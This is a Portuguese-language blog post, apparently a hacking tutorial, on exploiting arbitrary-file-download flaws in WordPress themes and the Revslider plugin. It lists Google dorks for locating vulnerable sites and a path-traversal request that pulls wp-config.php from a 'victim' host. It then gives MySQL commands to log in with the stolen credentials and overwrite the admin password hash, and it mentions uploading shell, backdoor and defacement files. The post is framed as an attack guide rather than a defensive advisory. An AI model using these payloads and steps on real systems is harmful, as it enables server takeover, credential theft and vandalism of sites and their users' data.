Hoje vou falar de uns vulnerabilidades no wordpress é a wordpress Multiple Themes Arbitrary File Download com elas conseguimos algumas credencias
como: host do mysql, user do mysql,pass do mysql
Essas vulnerabilitade o Risco é bem alto para o servidor, com podemos trocar a senha do administrator e assim entra no painel do worpress, e urpando algum $code malicioso para o servidor, assim tendo nosso proprio panel, ou backdoor, ou mesmo MakeDefacement.
Eu nao conhecia essa vul, quem me falou foi skeleton a uns dois meses atras, mais a muitos e muitos servidores nao corrigidos.
Exploit-db
# WordPress Ultimate Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://www.techerhut.com/download-x-v1-7-5-the-ultimate-wordpress-theme-themeforest/
# Tested on: Windows 7 and Gnu/Linux
# Exploit(Revslide):
- Google Dork: "Index of" +/wp-content/themes/ultimate/
- "Patch vul : /wp-content/themes/ultimate/"
- Google Dork: "Index of" +/wp-content/themes/IncredibleWP/
- "Patch vul : /wp-content/themes/IncredibleWP/"
- Google Dork: "Index of" +/wp-content/themes/ultimatum
- "Patch vul : /wp-content/themes/ultimatum/"
- Google Dork: "Index of" +/wp-content/themes/medicate/
- "Patch vul : /wp-content/themes/medicate/"
- Google Dork: "Index of" +/wp-content/themes/Centum/
- "Patch vul : /wp-content/themes/Centum/"
- Google Dork: "Index of" +/wp-content/themes/Avada/
- "Patch vul : /wp-content/themes/Avada/"
- Google Dork: "Index of" +/wp-content/themes/striking_r/
- "Patch vul : /wp-content/themes/striking_r/"
- Google Dork: "Index of" +/wp-content/themes/beach_apollo/
- "Patch vul : /wp-content/themes/beach_apollo/"
- Google Dork: "Index of" +/wp-content/themes/cuckootap/
- "Patch vul : /wp-content/themes/cuckootap/"
For this exploit ::
dork : revslider.php "index of" site:**
inurl:/revslider/rs-plugin/videojs/video-js.swf
inurl:/revslider/rs-plugin/videojs/
+ Dicas de Buscas
Poc:
- inurl:wp-content/plugins/revslider site:
- inurl:framework/plugins/revslider/ site:
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpExemple:
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpQUANDO ABRIR O ARQUIVO VOCÊ VERA ALGO IGUAL ISSO:
EXEMPLO
O que pode ser feito,trocar senha de admin, logar no painel Wordpress:
Ativar ou instalar alguns plugins para urpar nossa shell e ver uns dicas de diretoria para plugins e themas
USE O NMAP PARA VERIFICAR A PORTA 3306
Logar no servidor mysql
COMMANDOS:
mysql --host endereço_do_mysql.com --user usuario_aqui --password='senha_aqui'Vizualizar o banco de dados:
mysql> SHOW databases;Usar o banco worddeep:
mysql> USE worddeep;Vizualiza as tabelas:
mysql> SHOW tables;Seleciona a tabela usuarios:
mysql> SELECT * FROM wp_users;Atualiza uma senha um usuario:
mysql> UPDATE `nome_banco`.`nome_tabela` SET `nome_coluna`='$P$BeZiobCs7WNKp1mkSz2nujcQb6tbes0' WHERE `nome_tabela`.`ID`=1;Diretorios
DIR /wp-content/themes/twentyfourteen/404.phpArquivos usado no video download
DIR /wp-content/plugins/akismet/index.php
DIR /wp-content/plugins/hello.php
deUpload.php
deShell.php
deDeface.php
Video Demo
0 comentários:
Postar um comentário